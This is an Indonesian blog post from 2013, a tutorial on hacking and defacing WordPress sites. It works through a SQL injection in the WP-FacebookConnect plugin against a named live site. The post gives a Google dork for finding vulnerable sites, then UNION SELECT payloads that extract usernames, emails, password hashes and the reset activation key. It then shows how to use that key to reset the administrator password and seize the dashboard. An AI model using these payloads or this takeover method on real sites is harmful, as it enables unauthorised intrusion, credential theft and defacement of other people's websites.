Cara Mudah Hack atau Deface Wordpress

Cara Mudah Hack atau Deface Wordpress

Written By Polma Sihotang on Monday, 8 April 2013 | Monday, April 08, 2013 | ping fast  my blog, website, or RSS feed for Free


Sebelum kita bahas tutorial kali ini ada beberapa hal yang perlu anda tahu.
1) setiap wordpress perlu dork sqli.. (kamu bisa mendapatkannya di exploit-db.com)
2) pengetahuan sqli .. (saya tidak membahas nya di thread ini coz ini bukan tentang sqli)

1) Dork Saya gunakan disini
Ada beberapa eksploitasi sqli di plugin yang berbeda dan tema wordpress. Saya gunakan Exploit salah satu plugin yang disebut Wp-FacebookConnect.. dan dork google yang saya gunakan adalah ..



Code:
inurl:"/?fbconnect_action=myhome"

sekarang paste kode ini di google.com (salah satu teman terbaik saya)
dan kamu akan melihat banyak situs yang rentan terhadapat Sql, tetapi dulu, kemungkinan sekarang sudah banyak di upgrade ke versi baru, terngantung si punya WP menjulurkan lidah ...

2) sekarang yang saya gunakan untuk target di sini adalah

Code:
http://masaru.ikeda.me/?fbconnect_action=myhome&userid=2

[Image: 1.PNG]

 

di sini parameter userid rentan terhadap sqli ..
jadi mari kita lihat apa yang bisa kita dapatkan dari database ..
Saya akan mengubah URL di atas menjadi seperti ini

Code:
http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email),7,8,9,10,11,12+from+wp_users--

sekarang kamu dapat melihat saya mendapat username dengan id email ..

 
[Image: 2.PNG]

sekarang saya mengubah URL di atas menjadi seperti ini ..

Code:
http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat (user_login,0x3a,user_pass), ​​7,8,9,10,11,12+from+wp_users--

Maka saya akan mendapatkan user name dan password yang masih hashed MD5..

 
[Image: 3.PNG]

(Perlu dicatat di sini .. saya menggunakan concat sini .. kamu juga dapat menggunakan group_concat untuk mendapatkan semua User (Perlu pengetahuan anda untuk belajar cara menggunakan sqli))

sekarang .. kita semua tahu bahwa kategori hash wordpress MD5 (wordpress) berbeda dari MD5 yang lain nya dan sangat sederhana, kalau yang WP sangat sulit untuk retak ..

tetapi jika kamu kreatif.. kamu harus berpikir keluar dari kotak tsb untuk mendapat cara supaya bisa memecahkan nya..

jadi sekarang ikuti langkah-langkah di bawah untuk memecahkan nya..

a) pergi ke halaman login dari situs wordpress .. dalam kasus saya ini seperti di bawah..

Code:
http://masaru.ikeda.me/wp-login.php

b) klik pada Lost your password?

 
[Image: 4.PNG]

c) sekarang wordpress akan meminta saya untuk username Or email .. untuk me-reset password .. dalam kasus saya ini adalah username nya 'masaru' bisa anda lihat di atas tadi, username nya "masaru" Bukan?.. jadi lanjutkan dan masukkan username ..

 
[Image: 5.PNG]

d) sekarang lihat apa yang di bilang di halam tsb.. "Check your e-mail for the confirmation link ("Periksa e-mail untuk link konfirmasi.")"

 
[Image: 6.PNG]

 

e) sekarang wordpress akan mengirimkan kunci aktivasi ke alamat email dari pengguna tadi "masaru" tentu nya ke email dia.. dan menetapkan nilai dari kunci aktivasi dalam basis data.. apa yang harus kita lakukan untuk mendapatkan aktivasi kunci tadi?

f) jadi sekarang saya akan mengubah URL saya ini .. untuk mendapatkan kunci aktivasi ..

Code:
http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_activa ​​tion_key),7,8,9,10,11,12+from+wp_users--

dan kita dapat melihat .. kita punya kunci aktivasi di sini .. kita harus mencatat itu untuk menggunakan di suatu tempat nanti..

 
[Image: 7.PNG]

 

g) Sekarang .. yang harus kita lakukan adalah .. tanpa pergi ke alamat email untuk me-reset password .. kita hanya menambahkan URL ini saja maka nanti akan aktif dengan sendiri nya dan kita langsung di beri akses untuk mengubah password baru..

Code:
wp-login.php?action=rp&key=KEYHERE&login=USER NAME HERE

dan saya akan menggantikan KEYHERE dengan kunci aktivasi kita simpan tadi.. dan juga dengan USERNAME dengan username yang dalam kasus saya adalah 'Masaru' .. jadi URL di atas tadi akan menjadi seperti di bawah ini ..

Code:
http://masaru.ikeda.me/wp-login.php?action=rp&key=cFn9vDsT3X2ZnW8vEda6&login=masaru

dan lihat nanti.. wordpress akan meminta kamu untuk membuat password baru Cool ubah lah seperti yang anda ingin kan di page tsb

 
[Image: 8.PNG]

dan sekarang pergi ke halaman login lagi .. dan mencoba password baru dan anda mem-punya akses ke panel Wordpress..


 
[Image: 9.PNG]

Dan setelah itu apa yang harus saya lakukan?

0 komentar:

Posting Komentar